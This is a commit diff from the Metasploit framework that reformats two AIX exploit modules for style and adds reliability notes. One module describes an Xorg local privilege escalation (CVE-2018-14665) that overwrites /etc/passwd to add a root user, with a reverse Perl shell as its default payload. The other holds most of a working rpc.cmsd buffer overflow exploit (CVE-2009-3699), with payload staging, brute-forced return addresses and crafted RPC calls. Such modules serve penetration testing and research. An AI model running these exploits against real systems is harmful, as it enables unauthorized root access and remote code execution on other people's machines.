modules/exploits/aix: Resolve RuboCop violations

Author: bcoles

modules/exploits/aix/local/xorg_x11_server.rb

@@ -10,65 +10,67 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Xorg X11 Server Local Privilege Escalation',
-      'Description'    => %q(
-        WARNING: Successful execution of this module results in /etc/passwd being overwritten.
-
-        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
-
-        A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg.  This allows unprivileged users that can start the server
-        the ability to elevate privileges and run arbitrary code under root
-        privileges.
-
-        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
-        Due to permission restrictions of the crontab in AIX, this module does not use cron,
-        and instead overwrites /etc/passwd in order to create a new user with root privileges.
-        All currently logged in users need to be included when /etc/passwd is overwritten,
-        else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
-        The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
-        and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
-        overwriting /etc/passwd.
-      ),
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Xorg X11 Server Local Privilege Escalation',
+        'Description' => %q{
+          WARNING: Successful execution of this module results in /etc/passwd being overwritten.
+
+          This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
+
+          A permission check flaw exists for -modulepath and -logfile options when
+          starting Xorg.  This allows unprivileged users that can start the server
+          the ability to elevate privileges and run arbitrary code under root
+          privileges.
+
+          This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
+          Due to permission restrictions of the crontab in AIX, this module does not use cron,
+          and instead overwrites /etc/passwd in order to create a new user with root privileges.
+          All currently logged in users need to be included when /etc/passwd is overwritten,
+          else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
+          The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
+          and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
+          overwriting /etc/passwd.
+        },
+        'Author' => [
           'Narendra Shinde', # Discovery and original FreeBSD exploit
           'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
         ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2018-10-25',
-      'Notes'         =>
-        {
-          'SideEffects' => [ CONFIG_CHANGES ]
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2018-10-25',
+        'Notes' => {
+          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ]
         },
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2018-14665'],
           ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
           ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
           ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
           ['EDB', '45938']
         ],
-      'Platform'       => ['unix'],
-      'Arch'           => [ARCH_CMD],
-      'SessionTypes'   => ['shell'],
-      'Payload'        => {
-        'Compat' => {
-          'PayloadType'  => 'cmd',
-          'RequiredCmd'  => 'perl'
-        }
-      },
-      'DefaultOptions' => {
-        'Payload' => 'cmd/unix/reverse_perl'
-      },
-      'Targets'        =>
-        [
+        'Platform' => ['unix'],
+        'Arch' => [ARCH_CMD],
+        'SessionTypes' => ['shell'],
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'perl'
+          }
+        },
+        'DefaultOptions' => {
+          'Payload' => 'cmd/unix/reverse_perl'
+        },
+        'Targets' => [
           ['IBM AIX Version 6.1', {}],
           ['IBM AIX Version 7.1', {}],
           ['IBM AIX Version 7.2', {}]
         ],
-      'DefaultTarget'  => 1))
+        'DefaultTarget' => 1
+      )
+    )
 
     register_options(
       [

modules/exploits/aix/rpc_cmsd_opcode21.rb

@@ -10,70 +10,73 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow vulnerability in opcode 21 handled by
-        rpc.cmsd on AIX. By making a request with a long string passed to the first
-        argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
-        leads to arbitrary code execution.
+          rpc.cmsd on AIX. By making a request with a long string passed to the first
+          argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
+          leads to arbitrary code execution.
 
-        NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
-        further attempts are not possible.
-      },
-      'Author'         =>
-        [
+          NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
+          further attempts are not possible.
+        },
+        'Author' => [
           'Rodrigo Rubira Branco (BSDaemon)',
           'jduck',
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2009-3699' ],
           [ 'OSVDB', '58726' ],
           [ 'BID', '36615' ],
           [ 'URL', 'https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
           [ 'URL', 'https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
         ],
-      'Platform'       => [ 'aix' ],
-      'Payload'        =>
-        {
+        'Platform' => [ 'aix' ],
+        'Payload' => {
           'Space' => 4104,
           'BadChars' => "\x00",
           # The RPC function splits the string by 0x40, watch out!
           # It's not a payload badchar since we're putting the payload elsewhere...
           'DisableNops' => true
         },
-      'Targets'        =>
-        [
+        'Targets' => [
           [
             'IBM AIX Version 5.1',
             {
-              'Arch'     => 'ppc',
+              'Arch' => 'ppc',
               'Platform' => 'aix',
-              'AIX'      => '5.1',
+              'AIX' => '5.1',
               'Bruteforce' =>
               {
                 'Start' => { 'Ret' => 0x2022dfc8 },
-                #worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
-                'Stop'  => { 'Ret' => 0x202302c8 },
-                'Step'  => 600
+                # worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
+                'Stop' => { 'Ret' => 0x202302c8 },
+                'Step' => 600
               }
             }
           ],
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2009-10-07'))
-
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-10-07',
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
   end
 
   def brute_exploit(brute_target)
-
-    if not @aixpayload
+    if !@aixpayload
       datastore['AIX'] = target['AIX']
       @aixpayload = regenerate_payload.encoded
     end
 
-    print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
+    print_status('Trying to exploit rpc.cmsd with address 0x%x ...' % brute_target['Ret'])
 
     begin
       sunrpc_create('udp', 100068, 4)
@@ -82,22 +85,21 @@ def brute_exploit(brute_target)
       buf = make_nops(1024 - @aixpayload.length)
       buf << @aixpayload
       xdr = Rex::Encoder::XDR.encode(buf, buf)
-      10.times {
+      10.times do
         sunrpc_call(7, xdr, 2)
-      }
+      end
 
-      #print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
+      # print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
 
       buf = rand_text_alphanumeric(payload_space)
       buf << [brute_target['Ret']].pack('N')
 
-      xdr = Rex::Encoder::XDR.encode(buf, "")
+      xdr = Rex::Encoder::XDR.encode(buf, '')
       sunrpc_authunix('localhost', 0, 0, [])
       sunrpc_call(21, xdr, 2)
 
       handler(sunrpc_callsock)
       sunrpc_destroy
-
     rescue Rex::Proto::SunRPC::RPCTimeout
       vprint_error('RPCTimeout')
     rescue Rex::Proto::SunRPC::RPCError => e